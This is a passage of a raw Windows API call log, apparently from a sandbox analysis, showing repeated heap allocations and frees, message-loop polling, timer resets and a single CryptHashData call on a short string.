RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0239.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0239.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0239.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0239.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0239.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0239.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0239.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e513e8 [0239.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0239.504] CryptHashData (hHash=0xa87090, pbData=0x2e550c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0239.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0239.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0239.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0239.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0239.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0239.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0239.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0239.510] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0239.511] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0239.511] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0239.511] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0239.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0239.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0239.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0239.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0239.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0239.512] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0239.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0239.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0239.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0239.514] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0239.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0239.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0239.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0239.561] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0239.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0239.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0239.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0239.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0239.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0239.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0239.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0239.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0239.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0239.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0239.565] RtlAllocateHeap 